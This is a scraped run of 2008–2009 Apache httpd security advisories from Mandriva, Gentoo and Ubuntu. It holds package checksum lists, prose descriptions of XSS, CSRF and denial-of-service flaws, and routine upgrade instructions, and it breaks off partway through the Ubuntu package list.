 7557a733237c84de3477113a80119656  2008.0/i586/apache-mod_file_cache-2.2.6-8.2mdv2008.0.i586.rpm
 586a9e027e6ec327c24f231d1c2705e3  2008.0/i586/apache-mod_ldap-2.2.6-8.2mdv2008.0.i586.rpm
 de055c23ec9eac3ac78f6a31146db8a9  2008.0/i586/apache-mod_mem_cache-2.2.6-8.2mdv2008.0.i586.rpm
 4a32c704527fd42c97ffb8be87531363  2008.0/i586/apache-mod_proxy-2.2.6-8.2mdv2008.0.i586.rpm
 ad7bdc0861c42629366b0c4f0552eb0a  2008.0/i586/apache-mod_proxy_ajp-2.2.6-8.2mdv2008.0.i586.rpm
 0ae1b7ba57162f8ae870e08e48f0d964  2008.0/i586/apache-mod_ssl-2.2.6-8.2mdv2008.0.i586.rpm
 2d848e1ee979d12c66ef10b638ebce6e  2008.0/i586/apache-modules-2.2.6-8.2mdv2008.0.i586.rpm
 085e672acacd0642f2baa8bce631b26b  2008.0/i586/apache-mod_userdir-2.2.6-8.2mdv2008.0.i586.rpm
 3564507283ffddfaa528991d514ce3c4  2008.0/i586/apache-mpm-event-2.2.6-8.2mdv2008.0.i586.rpm
 360033e8459d52a323753246d977eb2b  2008.0/i586/apache-mpm-itk-2.2.6-8.2mdv2008.0.i586.rpm
 ca4c9127740d3a433087031c706878ab  2008.0/i586/apache-mpm-prefork-2.2.6-8.2mdv2008.0.i586.rpm
 b892724c9776743f777ebf9da44159a8  2008.0/i586/apache-mpm-worker-2.2.6-8.2mdv2008.0.i586.rpm
 15cc53561ac91ba3f89af6c2057726a7  2008.0/i586/apache-source-2.2.6-8.2mdv2008.0.i586.rpm 
 fb2e547dc2b02b0d55384751729d8c2a  2008.0/SRPMS/apache-2.2.6-8.2mdv2008.0.src.rpm
 Mandriva Linux 2008.0/X86_64:
 f5c28f5db00c8d87e77bbe8b387c29e1  2008.0/x86_64/apache-base-2.2.6-8.2mdv2008.0.x86_64.rpm
 2ea378183715ca15ead2b60c0ba6d1f3  2008.0/x86_64/apache-devel-2.2.6-8.2mdv2008.0.x86_64.rpm
 d15052d92f5918f47be634f052f5c8f8  2008.0/x86_64/apache-htcacheclean-2.2.6-8.2mdv2008.0.x86_64.rpm
 e00bae3dea071434ee63a0708f9cb2c9  2008.0/x86_64/apache-mod_authn_dbd-2.2.6-8.2mdv2008.0.x86_64.rpm
 e16ceda13087b1e924b1233fa4c58568  2008.0/x86_64/apache-mod_cache-2.2.6-8.2mdv2008.0.x86_64.rpm
 86ddeb3f207a928c537a1bac4a3b59f1  2008.0/x86_64/apache-mod_dav-2.2.6-8.2mdv2008.0.x86_64.rpm
 2a239f7bd6a3e74a29b69f29f217fd98  2008.0/x86_64/apache-mod_dbd-2.2.6-8.2mdv2008.0.x86_64.rpm
 6c3faec4fd23ed64ecbf508097fa948c  2008.0/x86_64/apache-mod_deflate-2.2.6-8.2mdv2008.0.x86_64.rpm
 286c89f9021f2e766324f52196b6e03f  2008.0/x86_64/apache-mod_disk_cache-2.2.6-8.2mdv2008.0.x86_64.rpm
 480c9861c06f5b535bcd0bd87e225023  2008.0/x86_64/apache-mod_file_cache-2.2.6-8.2mdv2008.0.x86_64.rpm
 61ed284bda26162a1da185a2aedca12e  2008.0/x86_64/apache-mod_ldap-2.2.6-8.2mdv2008.0.x86_64.rpm
 2c8670da45ffbff476a189f4af7eecb3  2008.0/x86_64/apache-mod_mem_cache-2.2.6-8.2mdv2008.0.x86_64.rpm
 bee8fdde4536e497abfc7e48dd659689  2008.0/x86_64/apache-mod_proxy-2.2.6-8.2mdv2008.0.x86_64.rpm
 d45fe91cccf27cd403cfb2fd2f5bb5ba  2008.0/x86_64/apache-mod_proxy_ajp-2.2.6-8.2mdv2008.0.x86_64.rpm
 d9becf61089cb4dc0b224e4fccb11fb4  2008.0/x86_64/apache-mod_ssl-2.2.6-8.2mdv2008.0.x86_64.rpm
 62ac5f1ec4c984dce76176203f5eeb6e  2008.0/x86_64/apache-modules-2.2.6-8.2mdv2008.0.x86_64.rpm
 7042049d1d0b99c1e7f46142d6993761  2008.0/x86_64/apache-mod_userdir-2.2.6-8.2mdv2008.0.x86_64.rpm
 bd06a8f2c4074d5722556c38c5e0dc03  2008.0/x86_64/apache-mpm-event-2.2.6-8.2mdv2008.0.x86_64.rpm
 6848d1ad52463fbf9de4631b22a4dd81  2008.0/x86_64/apache-mpm-itk-2.2.6-8.2mdv2008.0.x86_64.rpm
 6bc3fee77b90a73d54dba755a96f4e11  2008.0/x86_64/apache-mpm-prefork-2.2.6-8.2mdv2008.0.x86_64.rpm
 e9b20462aef79d790d604da2e59cc503  2008.0/x86_64/apache-mpm-worker-2.2.6-8.2mdv2008.0.x86_64.rpm
 a378e191f066f819419106a65e472535  2008.0/x86_64/apache-source-2.2.6-8.2mdv2008.0.x86_64.rpm 
 fb2e547dc2b02b0d55384751729d8c2a  2008.0/SRPMS/apache-2.2.6-8.2mdv2008.0.src.rpm
 Mandriva Linux 2008.1:
 19bd0997c144cfd6c0792227f97c840a  2008.1/i586/apache-base-2.2.8-6.1mdv2008.1.i586.rpm
 c0bc6f89d51f7aeb0a907155ce424e63  2008.1/i586/apache-devel-2.2.8-6.1mdv2008.1.i586.rpm
 38019754e020560317f9e4143c31120b  2008.1/i586/apache-htcacheclean-2.2.8-6.1mdv2008.1.i586.rpm
 9d4d3b487b9e4a930e0dfad6f9a86b11  2008.1/i586/apache-mod_authn_dbd-2.2.8-6.1mdv2008.1.i586.rpm
 dcd9a987da631e20f0af5825c7a0f4cf  2008.1/i586/apache-mod_cache-2.2.8-6.1mdv2008.1.i586.rpm
 9d77821dcb46af8c01e7dd30a74fd3f5  2008.1/i586/apache-mod_dav-2.2.8-6.1mdv2008.1.i586.rpm
 7ec8c8bec08a8c7812e93ae6f630d721  2008.1/i586/apache-mod_dbd-2.2.8-6.1mdv2008.1.i586.rpm
 4b3f7f658ca523658fcff97884404569  2008.1/i586/apache-mod_deflate-2.2.8-6.1mdv2008.1.i586.rpm
 838d9649e9f9850ff7f50a9686783958  2008.1/i586/apache-mod_disk_cache-2.2.8-6.1mdv2008.1.i586.rpm
 114c083f976c1c59f9ed2fc7865f47b9  2008.1/i586/apache-mod_file_cache-2.2.8-6.1mdv2008.1.i586.rpm
 efc293cd668271a0131d84a9776e7cb4  2008.1/i586/apache-mod_ldap-2.2.8-6.1mdv2008.1.i586.rpm
 e1e2413f175fa207ffb8d5ce2903439f  2008.1/i586/apache-mod_mem_cache-2.2.8-6.1mdv2008.1.i586.rpm
 80e42fb54b7c926bd4ae6c8869bfe2b4  2008.1/i586/apache-mod_proxy-2.2.8-6.1mdv2008.1.i586.rpm
 b14cb1c38ff72f65af3dc26f419248b2  2008.1/i586/apache-mod_proxy_ajp-2.2.8-6.1mdv2008.1.i586.rpm
 222d326db8d3d9c7ff49a5edf54ad460  2008.1/i586/apache-mod_ssl-2.2.8-6.1mdv2008.1.i586.rpm
 8d4d65f206604150103a767559ce4ac0  2008.1/i586/apache-modules-2.2.8-6.1mdv2008.1.i586.rpm
 a02bf7d7cd6cb86b24728055f31e00e8  2008.1/i586/apache-mod_userdir-2.2.8-6.1mdv2008.1.i586.rpm
 762b5a44d6ab770663e7802db5880c5c  2008.1/i586/apache-mpm-event-2.2.8-6.1mdv2008.1.i586.rpm
 1ad89877cf9e1d19c9c0ae31da79cc4b  2008.1/i586/apache-mpm-itk-2.2.8-6.1mdv2008.1.i586.rpm
 9e88d760212153696531a36e44e599da  2008.1/i586/apache-mpm-prefork-2.2.8-6.1mdv2008.1.i586.rpm
 f50d7edde588f2439aa4e831a63c35d7  2008.1/i586/apache-mpm-worker-2.2.8-6.1mdv2008.1.i586.rpm
 a9f60a580681ac55bc61ae250326dc6a  2008.1/i586/apache-source-2.2.8-6.1mdv2008.1.i586.rpm 
 ffe7ace0a88205f764b21be6cf4ed2e1  2008.1/SRPMS/apache-2.2.8-6.1mdv2008.1.src.rpm
 Mandriva Linux 2008.1/X86_64:
 7aafb608166a15e6373c11011e72117d  2008.1/x86_64/apache-base-2.2.8-6.1mdv2008.1.x86_64.rpm
 9c39fe151fc9261c77fc5484f793358d  2008.1/x86_64/apache-devel-2.2.8-6.1mdv2008.1.x86_64.rpm
 d5dd9482dbfed961af363261f769a136  2008.1/x86_64/apache-htcacheclean-2.2.8-6.1mdv2008.1.x86_64.rpm
 a839a342ce15d6076907fa85b652ac45  2008.1/x86_64/apache-mod_authn_dbd-2.2.8-6.1mdv2008.1.x86_64.rpm
 c1cdf8ea93464f350cd5a97282a963a8  2008.1/x86_64/apache-mod_cache-2.2.8-6.1mdv2008.1.x86_64.rpm
 0ebe3595df3974b090e1e41653a61ac8  2008.1/x86_64/apache-mod_dav-2.2.8-6.1mdv2008.1.x86_64.rpm
 50d80ef4989cecf6d9b4d3a36e91c3f8  2008.1/x86_64/apache-mod_dbd-2.2.8-6.1mdv2008.1.x86_64.rpm
 89badb88265d34c6b4dafcbd7240618d  2008.1/x86_64/apache-mod_deflate-2.2.8-6.1mdv2008.1.x86_64.rpm
 6814c312ec71fa619e1533f08ed3d1fa  2008.1/x86_64/apache-mod_disk_cache-2.2.8-6.1mdv2008.1.x86_64.rpm
 ea7900772a2a78ba4913c41762c39069  2008.1/x86_64/apache-mod_file_cache-2.2.8-6.1mdv2008.1.x86_64.rpm
 b146eaeb311a6107d51413bc29d70315  2008.1/x86_64/apache-mod_ldap-2.2.8-6.1mdv2008.1.x86_64.rpm
 7198b641d46ea2f24664c4a9d02b9063  2008.1/x86_64/apache-mod_mem_cache-2.2.8-6.1mdv2008.1.x86_64.rpm
 e04cdfbbad417123adae10cf13a2b626  2008.1/x86_64/apache-mod_proxy-2.2.8-6.1mdv2008.1.x86_64.rpm
 8f9a04efe7760b08220b27f1cabd8a49  2008.1/x86_64/apache-mod_proxy_ajp-2.2.8-6.1mdv2008.1.x86_64.rpm
 8ed701d6c742a5e60196653f79989a8a  2008.1/x86_64/apache-mod_ssl-2.2.8-6.1mdv2008.1.x86_64.rpm
 3beb942d20bf63c2bc8cef202ef0e0aa  2008.1/x86_64/apache-modules-2.2.8-6.1mdv2008.1.x86_64.rpm
 fd40ed97d50b583c7f21a686d8146c7d  2008.1/x86_64/apache-mod_userdir-2.2.8-6.1mdv2008.1.x86_64.rpm
 f7451170b9c2c7f3f55a0d44567bebfe  2008.1/x86_64/apache-mpm-event-2.2.8-6.1mdv2008.1.x86_64.rpm
 6e1b59583a15313f8dbf347170ec581d  2008.1/x86_64/apache-mpm-itk-2.2.8-6.1mdv2008.1.x86_64.rpm
 b60967808f886fc4444054fe4ba685fd  2008.1/x86_64/apache-mpm-prefork-2.2.8-6.1mdv2008.1.x86_64.rpm
 0ab90ebae3fcfd1fa809e62e546222db  2008.1/x86_64/apache-mpm-worker-2.2.8-6.1mdv2008.1.x86_64.rpm
 7726d40130eb5a14d8cf272cd08f7485  2008.1/x86_64/apache-source-2.2.8-6.1mdv2008.1.x86_64.rpm 
 ffe7ace0a88205f764b21be6cf4ed2e1  2008.1/SRPMS/apache-2.2.8-6.1mdv2008.1.src.rpm
 Corporate 4.0:
 b59bbaecc0f3c6301bee564c2862430a  corporate/4.0/i586/apache-base-2.2.3-1.4.20060mlcs4.i586.rpm
 b3141af91788ac68afd1cfb34426cec3  corporate/4.0/i586/apache-devel-2.2.3-1.4.20060mlcs4.i586.rpm
 309db27fc902b7eb77e0fd2b5e03359f  corporate/4.0/i586/apache-htcacheclean-2.2.3-1.4.20060mlcs4.i586.rpm
 8e7d56d01a51b7239b080765fd858088  corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.4.20060mlcs4.i586.rpm
 8e6bd8c3a89f5f277fb56e60b37bb6a9  corporate/4.0/i586/apache-mod_cache-2.2.3-1.4.20060mlcs4.i586.rpm
 fd99c7e58d56eb14a0e94c27edb2daf2  corporate/4.0/i586/apache-mod_dav-2.2.3-1.4.20060mlcs4.i586.rpm
 75968093eca9011dd115d948c44f29ba  corporate/4.0/i586/apache-mod_dbd-2.2.3-1.4.20060mlcs4.i586.rpm
 ba5118b4c1caa7e4b75229b5643b06b9  corporate/4.0/i586/apache-mod_deflate-2.2.3-1.4.20060mlcs4.i586.rpm
 abb27116fae7ff7d319516c0f9a0a5e4  corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.4.20060mlcs4.i586.rpm
 e1bb6ed7fb0fbb39f762a932f34dc67b  corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.4.20060mlcs4.i586.rpm
 a3d85c92d66a0ca0ed6dc6a6c6df23b4  corporate/4.0/i586/apache-mod_ldap-2.2.3-1.4.20060mlcs4.i586.rpm
 eca828a6bd374d98af6fd785aa6970af  corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.4.20060mlcs4.i586.rpm
 8e28a95bd7f655c5b98c7405ca74de18  corporate/4.0/i586/apache-mod_proxy-2.2.3-1.4.20060mlcs4.i586.rpm
 23a2687957dae00dadc44b864032a838  corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.4.20060mlcs4.i586.rpm
 a4a143aa2f9f8b1d3cedf68429a90fa4  corporate/4.0/i586/apache-mod_ssl-2.2.3-1.4.20060mlcs4.i586.rpm
 779cf371acd7012ac1acfaac0062a38a  corporate/4.0/i586/apache-modules-2.2.3-1.4.20060mlcs4.i586.rpm
 e1a8927f0cfd3a08ca2af42ebc64932e  corporate/4.0/i586/apache-mod_userdir-2.2.3-1.4.20060mlcs4.i586.rpm
 3415eea7176bb392b87540c2bfcfed2b  corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.4.20060mlcs4.i586.rpm
 9b79811544ad30fd91608d5839b521eb  corporate/4.0/i586/apache-mpm-worker-2.2.3-1.4.20060mlcs4.i586.rpm
 1403616f0ba1cbcc552f7e33a32b303f  corporate/4.0/i586/apache-source-2.2.3-1.4.20060mlcs4.i586.rpm 
 fdda31ac2d27f5fe856746719b3ae87a  corporate/4.0/SRPMS/apache-2.2.3-1.4.20060mlcs4.src.rpm
 Corporate 4.0/X86_64:
 e46ce6fe84b67d3d6caf6782d9352555  corporate/4.0/x86_64/apache-base-2.2.3-1.4.20060mlcs4.x86_64.rpm
 5b1993dca50465213ca285d3fc38bc07  corporate/4.0/x86_64/apache-devel-2.2.3-1.4.20060mlcs4.x86_64.rpm
 7076dbe94461207aa2399b887e6b669f  corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.4.20060mlcs4.x86_64.rpm
 e51acf392e315892cfc60ef342b3e9f0  corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.4.20060mlcs4.x86_64.rpm
 270e619d353fa9348b2d5713e660bb69  corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.4.20060mlcs4.x86_64.rpm
 8e8ae8e260b69d7150c6d7f8162eb261  corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.4.20060mlcs4.x86_64.rpm
 11fc6ca48580398733c9c26c6097aeb8  corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.4.20060mlcs4.x86_64.rpm
 6750c2039c64dd866146d240f06b302f  corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.4.20060mlcs4.x86_64.rpm
 0c7db97343700984a02d6365069bfbd5  corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.4.20060mlcs4.x86_64.rpm
 d60aa90ac7a459f237a6c0ed190b0ea1  corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.4.20060mlcs4.x86_64.rpm
 873b63a672417971078076a5e3e4f363  corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.4.20060mlcs4.x86_64.rpm
 d964415079d86d6c6ff78381e3dfe8ef  corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.4.20060mlcs4.x86_64.rpm
 c014bede921593c1035d8a1488909ab9  corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.4.20060mlcs4.x86_64.rpm
 d4469077e683ea2a034bfb35be9ca8f6  corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.4.20060mlcs4.x86_64.rpm
 35638d36e7c4832f70460294ef496d33  corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.4.20060mlcs4.x86_64.rpm
 de62531cfcf279b966c08940df7dc298  corporate/4.0/x86_64/apache-modules-2.2.3-1.4.20060mlcs4.x86_64.rpm
 a44db8a0824aa8ec654338640e30e14c  corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.4.20060mlcs4.x86_64.rpm
 be326111f9e8dd9fb0a9a7699f7f99dd  corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.4.20060mlcs4.x86_64.rpm
 3b29042dd082e4f0f8e04fbff2f14c23  corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.4.20060mlcs4.x86_64.rpm
 576aed8c357f707db0e488e13b68834c  corporate/4.0/x86_64/apache-source-2.2.3-1.4.20060mlcs4.x86_64.rpm 
 fdda31ac2d27f5fe856746719b3ae87a  corporate/4.0/SRPMS/apache-2.2.3-1.4.20060mlcs4.src.rpm
 _______________________________________________________________________
 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you. 
 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:
  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
 You can view other update advisories for Mandriva Linux at:
  http://www.mandriva.com/security/advisories
 If you want to report vulnerabilities, please contact
  security_(at)_mandriva.com
 _______________________________________________________________________
 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFIzBUvmqjQ0CJFipgRApHOAKCvASwDjqj110UnAsle/Jtgw9VwhwCg7zVf
0jg30niEBGmySzuHETORyts=
=wMau
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. 
 
 This update also provides HTTP/1.1 compliance fixes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200807-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  Severity: Normal
     Title: Apache: Denial of Service
      Date: July 09, 2008
      Bugs: #222643, #227111
        ID: 200807-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Apache might lead to a Denial of Service. 
Affected packages
=================
    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-servers/apache       < 2.2.9                         >= 2.2.9
Description
===========
Multiple vulnerabilities have been discovered in Apache:
* Dustin Kirkland reported that the mod_ssl module can leak memory
  when the client reports support for a compression algorithm
  (CVE-2008-1678). 
Impact
======
A remote attacker could exploit these vulnerabilities by connecting to
an Apache httpd, by causing an Apache proxy server to connect to a
malicious server, or by enticing a balancer administrator to connect to
a specially-crafted URL, resulting in a Denial of Service of the Apache
daemon. 
Workaround
==========
There is no known workaround at this time. 
Resolution
==========
All Apache users should upgrade to the latest version:
    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/apache-2.2.9"
References
==========
  [ 1 ] CVE-2007-6420
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6420
  [ 2 ] CVE-2008-1678
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1678
  [ 3 ] CVE-2008-2364
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2364
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
  http://security.gentoo.org/glsa/glsa-200807-06.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org. 
License
=======
Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s). 
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license. 
http://creativecommons.org/licenses/by-sa/2.5
. The HP Business Availability Center v8.02 kit is available on the HP Software Support Online portal at: http://support.openview.hp.com/support.jsp . ===========================================================
Ubuntu Security Notice USN-731-1             March 10, 2009
apache2 vulnerabilities
CVE-2007-6203, CVE-2007-6420, CVE-2008-1678, CVE-2008-2168,
CVE-2008-2364, CVE-2008-2939
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu. 
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
  apache2-common                  2.0.55-4ubuntu2.4
  apache2-mpm-perchild            2.0.55-4ubuntu2.4
  apache2-mpm-prefork             2.0.55-4ubuntu2.4
  apache2-mpm-worker              2.0.55-4ubuntu2.4
Ubuntu 7.10:
  apache2-mpm-event               2.2.4-3ubuntu0.2
  apache2-mpm-perchild            2.2.4-3ubuntu0.2
  apache2-mpm-prefork             2.2.4-3ubuntu0.2
  apache2-mpm-worker              2.2.4-3ubuntu0.2
  apache2.2-common                2.2.4-3ubuntu0.2
Ubuntu 8.04 LTS:
  apache2-mpm-event               2.2.8-1ubuntu0.4
  apache2-mpm-perchild            2.2.8-1ubuntu0.4
  apache2-mpm-prefork             2.2.8-1ubuntu0.4
  apache2-mpm-worker              2.2.8-1ubuntu0.4
  apache2.2-common                2.2.8-1ubuntu0.4
In general, a standard system upgrade is sufficient to effect the
necessary changes. 
Details follow:
It was discovered that Apache did not sanitize the method specifier header from
an HTTP request when it is returned in an error message, which could result in
browsers becoming vulnerable to cross-site scripting attacks when processing the
output. With cross-site scripting vulnerabilities, if a user were tricked into
viewing server output during a crafted server request, a remote attacker could
exploit this to modify the contents, or steal confidential data (such as
passwords), within the same domain. (CVE-2007-6203)
It was discovered that Apache was vulnerable to a cross-site request forgery
(CSRF) in the mod_proxy_balancer balancer manager. If an Apache administrator
were tricked into clicking a link on a specially crafted web page, an attacker
could trigger commands that could modify the balancer manager configuration. (CVE-2007-6420)
It was discovered that Apache had a memory leak when using mod_ssl with
compression. A remote attacker could exploit this to exhaust server memory,
leading to a denial of service. 
(CVE-2008-1678)
It was discovered that in certain conditions, Apache did not specify a default
character set when returning certain error messages containing UTF-7 encoded
data, which could result in browsers becoming vulnerable to cross-site scripting
attacks when processing the output. (CVE-2008-2364)
It was discovered that mod_proxy_ftp did not sanitize wildcard pathnames when
they are returned in directory listings, which could result in browsers becoming
vulnerable to cross-site scripting attacks when processing the output. 
(CVE-2008-2939)
Updated packages for Ubuntu 6.06 LTS:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.4.diff.gz
      Size/MD5:   123478 7a5b444231dc27ee60c1bd63f42420c6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.4.dsc
      Size/MD5:     1156 4f9a0f31d136914cf7d6e1a92656a47b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz
      Size/MD5:  6092031 45e32c9432a8e3cf4227f5af91b03622
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.4_all.deb
      Size/MD5:  2124948 5153435633998e4190b54eb101afd271
  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:   833336 d5b9ecf82467eb04a94957321c4a95a2
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:   228588 f4b9b82016eb22a60da83ae716fd028a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:   223600 2cf77e3daaadcc4e07da5e19ecac2867
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:   228216 60ff106ddefe9b68c055825bcd6ec52f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:   171724 bae5e3d30111e97d34b25594993ad488
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:   172508 77bdf00092378c89ae8be7f5139963e0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:    94562 f3a168c57db1f5be11cfdba0bdc20062
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:    36618 a7f34da28f7bae0cffb3fdb73da70143
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:   286028 a5b380d9c6a651fe043ad2358ef61143
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.4_amd64.deb
      Size/MD5:   144590 9a4031c258cfa264fb8baf305bc0cea6
  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:   786528 353ed1839a8201d0211ede114565e60d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:   203256 7b0caa06fd47a28a8a92d1b69c0b4667
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:   199114 6a77314579722ca085726e4220be4e9f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:   202654 ffad2838e3c8c79ecd7e21f79aa78216
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:   171716 771492b2b238424e33e3e7853185c0ca
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:   172498 b5f7a4ed03ebafa4c4ff75c05ebf53b7
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:    92520 787a673994d746b4ad3788c16516832a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:    36620 4d5f0f18c3035f41cb8234af3cc1092c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:   262082 d6a7111b9f2ed61e1aeb2f18f8713873
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.4_i386.deb
      Size/MD5:   132518 5a335222829c066cb9a0ddcaeee8a0da
  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:   859446 cf555341c1a8b4a39808b8a3bd76e03a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:   220622 85b902b9eecf3d40577d9e1e8bf61467
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:   216314 146e689e30c6e1681048f6cf1dd659e3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:   220128 10f65b3961a164e070d2f18d610df67b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:   171726 9e341f225cb19d5c44f343cc68c0bba5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:   172512 331dff8d3de7cd694d8e115417bed4f8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:   104284 7ab80f14cd9072d23389e27f934079f3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:    36620 713bfffcca8ec4e9531c635069f1cd0d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:   281600 ad1671807965e2291b5568c7b4e95e14
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.4_powerpc.deb
      Size/MD5:   141744 6b04155aa1dbf6f657dbfa27d6086617
  sparc architecture (Sun SPARC/UltraSPARC):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:   803706 f14be1535acf528f89d301c8ec092015
